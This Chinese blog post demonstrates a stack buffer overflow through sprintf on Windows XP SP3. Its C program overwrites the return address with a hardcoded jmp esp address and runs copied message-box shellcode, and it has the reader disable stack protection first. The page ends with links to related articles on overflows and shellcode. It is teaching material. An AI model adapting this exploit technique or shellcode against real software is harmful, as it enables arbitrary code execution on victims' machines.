sprintf缓冲区溢出

最新推荐文章于 2023-03-10 23:56:15 发布
最新推荐文章于 2023-03-10 23:56:15 发布
阅读量321 收藏
点赞数
文章标签: shell 操作系统 c/c++
这段代码的shellcode是抄的别人的,仅仅显示出一个msgbox提醒一下。
编译器为 vc 2005
操作系统为 xp sp3
如果你的编译器或者操作系统不完全相同,有可能溢出失败
大概原理为:
  执行sprintf时,将我们构造的长字符串拷贝到堆栈区,从而覆盖了fun函数的返回地址(字符串16字节处),而此时esp正好指向字符串20字节处,因此我们将16处覆盖为jmp esp指令的地址, 将20字节处覆盖为我们的shell code。当函数fun返回时,正好将jmp esp的地址出栈,而执行了jmp esp后,正好执行到20字节处的shell code。

1 None.gif #include  < stdio.h >
 2 None.gif#include  < string .h >
 3 None.gif
  4 ExpandedBlockStart.gifContractedBlock.gif /**/ /***********************************************************************
 5InBlock.gifplease disable 缓冲区安全检查:
 6InBlock.gif    c/c++ -> 代码生成 -> 缓冲区安全检查=否(/GS-)
 7InBlock.gifplease disable 优化:
 8InBlock.gif    c/c++ -> 优化 ->优化=禁用(/Od)
 9ExpandedBlockEnd.gif************************************************************************/
10 None.gif void  fun( const   char *  input)
 11 None.gif
 12 ExpandedBlockStart.gifContractedBlock.gif dot.gif {
13InBlock.gif
14InBlock.gif    char buf[10];
15InBlock.gif    //_asm int 3;
16InBlock.gif    printf("My stack look like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
17InBlock.gif    sprintf(buf,"%s",input);//这里会造成溢出
18InBlock.gif
19InBlock.gif    printf("%s\n",buf);
20InBlock.gif    //_asm int 3;
21InBlock.gif    
22InBlock.gif    printf("New stack look like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
23ExpandedSubBlockStart.gifContractedSubBlock.gif    /**//*_asm
24InBlock.gif    {
25InBlock.gif        mov         ecx,dword ptr [ebp-4] ;
26InBlock.gif        xor         ecx,ebp;
27InBlock.gif        mov eax,0x403000;
28InBlock.gif        mov [eax],ecx;
29ExpandedSubBlockEnd.gif    }*/
30ExpandedBlockEnd.gif}
31 None.gif
 32 None.gif
 33 None.gif char  failwest_popup[] =
34 None.gif " \xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C "
35 None.gif " \x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53 "
36 None.gif " \x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B "
37 None.gif " \x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95 "
38 None.gif " \xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59 "
39 None.gif " \x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A "
40 None.gif " \xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75 "
41 None.gif " \xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03 "
42 None.gif " \x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB "
43 None.gif " \x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50 "
44 None.gif " \x53\xFF\x57\xFC\x53\xFF\x57\xF8 " ;
 45 None.gif
 46 None.gif int  main( int  argc,  char *  argv[])
 47 None.gif
 48 ExpandedBlockStart.gifContractedBlock.gif dot.gif {
49InBlock.gif
50InBlock.gif    printf("address of foo=%p\n",fun);
51InBlock.gif
52InBlock.gif#define N 1000
53InBlock.gif    char ss[N];//="AAAAAAAAAA";
54InBlock.gif        
55InBlock.gif    for (int i=0;i<N;i++)
56ExpandedSubBlockStart.gifContractedSubBlock.gif    dot.gif{
57InBlock.gif        ss[i]='0'+i/10;
58ExpandedSubBlockEnd.gif    }
59ExpandedSubBlockStart.gifContractedSubBlock.gif    /**//*int p=16;
60InBlock.gif    ss[p++]='2';
61InBlock.gif    ss[p++]='2';
62InBlock.gif    ss[p++]='2';
63InBlock.gif    ss[p++]='2';
64InBlock.gif    int p2=20;
65InBlock.gif    ss[p2++]='3';
66InBlock.gif    ss[p2++]='3';
67InBlock.gif    ss[p2++]='3';
68InBlock.gif    ss[p2++]='3';
69ExpandedSubBlockEnd.gif    ss[N-1]=0;*/
70InBlock.gif    strcpy(ss+16"\x12\x45\xfa\x7f"); //JMP ESP
71InBlock.gif    strcpy(ss+20, failwest_popup);
72InBlock.gif
73InBlock.gif    fun(ss);
74InBlock.gif
75InBlock.gif    return 0;
76InBlock.gif
77ExpandedBlockEnd.gif}  
 78 None.gif
 79 None.gif

weixin_34127717
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sprint 写入输入缓冲区_缓冲区溢出之栈溢出pwnme
weixin_39828331的博客
12-15 197
声明:由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,知微安全以及文章作者不为此承担任何责任。知微安全拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经知微安全允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。0x01 缓冲区溢出缓冲区溢出?刚开始看缓冲区溢出的时候,满脑子...
关于sprintf内存溢出
shihunyewu的博客
04-26 5312
需要把各种类型的数据整合到同一个字符串中的时候,我想到了用printf的近亲——sprintf,后来发现sprintf整合的结果总是不正确,下面上代码片段 char text[1]; /* print ip addresses and udp ports */ sprintf(text,"%d.%d.%d.%d.%d -> %d.%d.%d.%d.%d",
内存溢出sprintf
Thornger
05-07 2680
sprintf 在下面的代码例子中,name可能来自用户输入,文件系统或者网络。程序从字符串构造文件名,为打开文件做准备 #include <stdio.h> void func(const char *name) { char filename[128]; sprintf(filename, "%s.txt", name); } 因为sprinf函数不保证输入字符...
3.1 sprintf函数引起的缓冲区溢出
litterflybug的专栏
09-26 3353
3.1 sprintf函数引起的缓冲区溢出 2013-11-28 15:14 刘新浙/刘玲/王超/李敬娜 等 人民邮电出版社 字号:T | T 综合评级: 想读(0)  在读(0)  已读(0)   品书斋鉴(0)   已有0人发表书评 《从缺陷中学习C/C++》第3章库函数问题,本章主要介绍库函数的使用中会遇到的问题。使用库函数可以降低软件开发的难
使用sprintf 的常见问题
hi
05-26 9558
一个程序debug无错,而release有错。最终定位于某sprintf函数缓冲区溢出,在网上找了一些相关内容。使用sprintf 的常见问题sprintf 是个变参函数,使用时经常出问题,而且只要出问题通常就是能导致程序崩溃的内存访问错误,但好在由sprintf 误用导致的问题虽然严重,却很容易找出,无非就是那么几种情况,通常用眼睛再把出错的代码多看几眼就看出来了。1,缓冲区溢出
sprintf缓冲区溢出问题
weixin_30312557的博客
12-01 631
因为sprintf函数没有参数指定缓冲区的大小,这使得溢出的可能性很大,尤其是遇到 sprintf( buffer, "%s", a ) 如果不知道a的串长,就无法指定安全的缓冲区。 解决方法: 如果要用sprintf处理, 应该提前获取串a的长度len_a,然后动态申请len_a + 1大小的内存。 这样溢出问题就可以避免掉。 转载于:https://www.cnblogs.com/th...
sprintf(...)溢出边界导致程序崩溃的问题
scruffybear的专栏
03-10 1278
使用`sprintf(...)`进行格式化是一种标准的做法,但是这样做是有一个极大的风险,由于`sprintf(...)`不进行边界检查,这样会有写操作溢出边界的风险,并导致程序崩溃。本文进行了简单写操作溢出边界的测试,模拟程序崩溃,并建议了更为安全的`snprintf(...)`方法进行格式化。
使您的软件运行起来:防止缓冲区溢出(C语言)
02-27
本文内容包括:C编程中的主要陷阱避免内部缓冲区溢出其它危险是什么?静态和动态测试工具Java和堆栈保护可以提供帮助结束语参考资料在上一篇专栏文章中,描述了高水平的缓冲区溢出攻击,以及讨论了为什么缓冲区溢出...
缓冲区溢出光速入门 缓冲区溢出基基础
07-31
strcpy、sprintf、strcat 等函数都非常容易导致缓冲区溢出问题。 查阅C 语言编程的书籍时通常会告诉你程序溢出后会发生不可预料的结果。在网络安 全领域,缓冲区溢出利用的艺术在于让这个“不可预料的结果”变为我们...
缓冲区溢出攻防VC源代码
03-15
缓冲区溢出是一种常见的软件安全漏洞,主要发生在程序处理数据时,超过了预分配内存空间的边界,导致数据溢出到相邻的内存区域。这个过程可能会覆盖或破坏原本存储在该区域的数据,甚至可能改变程序执行流程,从而...
缓冲区溢出定位程序V 1.0
10-13
**缓冲区溢出定位程序V 1.0** 缓冲区溢出是计算机编程中的一个常见安全漏洞,尤其在C和C++等不进行自动内存管理的语言中尤为突出。当程序试图向固定大小的缓冲区写入超过其容量的数据时,就会发生溢出。这种现象...
Linux系统缓冲区溢出攻击的机理分析.pdf
09-07
"Linux系统缓冲区溢出攻击的机理分析" Linux系统缓冲区溢出攻击是目前最常用的黑客攻击技术之一。本文分析了这种攻击技术的原理,指出了Linux系统中进行这种攻击时,本地攻击和远程攻击的差异,并总结和归纳了几种...
sprintf函数可能会造成由buf指向的缓冲区溢出
xuefa的博客
10-20 1094
曾经在一个项目中遇到这样的执行出错:“stack over flow”,经查与sprintf有关。 int sprintf(char *restrict buf, const char *restrict format, ...) 调用者在使用sprintf函数有责任确保该缓冲区足够大。snprintf函数可以解决这种缓冲区溢出问题。 int snprintf(char *restrict
初识shellcode
海枫的专栏
02-01 5883
重点介绍shellcode的定义、作用、编写步骤以及分类。
esp8266 sprintf函数使用溢出问题
qq_27568125的博客
02-07 2621
在使用ESP8266 跑freertos操作系统时,如果使用sprintf函数进行将其他数据转换成字符串格式时,如果将存储字符串的数组定义成局部数组会出现程序跑死然后重启的问题。为了避免程序跑死问题,需要将存储字符串数组定义成全局数组或者局部数组用static关键字声明。出现这种问题的原因是在线程切换时数组的地址偏移出现了问题,来回切换地址出现了问题。一般情况下我们定义成全局变量就不会出现这种问题
如何编写本地shellcode
海枫的专栏
02-01 9490
本文介绍使用汇编语言编写shellcode的技巧,如零数值,绝对地址以及Linux系统调用约定。最后成功编写一个本地shellcode。
缓冲区溢出-printf格式化输出漏洞
weixin_34364135的博客
04-16 2571
0x00本文视频:如果文字过于枯燥可观看在线视频:https://edu.51cto.com/sd/165140x01基础知识:在c语言中printf的使用方法为printf(format,<参量表>),printf是c语言中少见的可变参数的库函数,printf在调用前无法知道传入的参数到底有多少个(在32位汇编中参数都是压入栈中,也就是说printf不知...
c++:写入时缓冲区溢出
最新发布
06-10
C++中写入时缓冲区溢出是一种常见的错误。这种错误通常发生在你试图向一个不够大的缓冲区中写入过多的数据时。这可能会导致程序崩溃或者出现未定义的行为。 为了避免这种错误,你应该在写入数据之前检查缓冲区的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值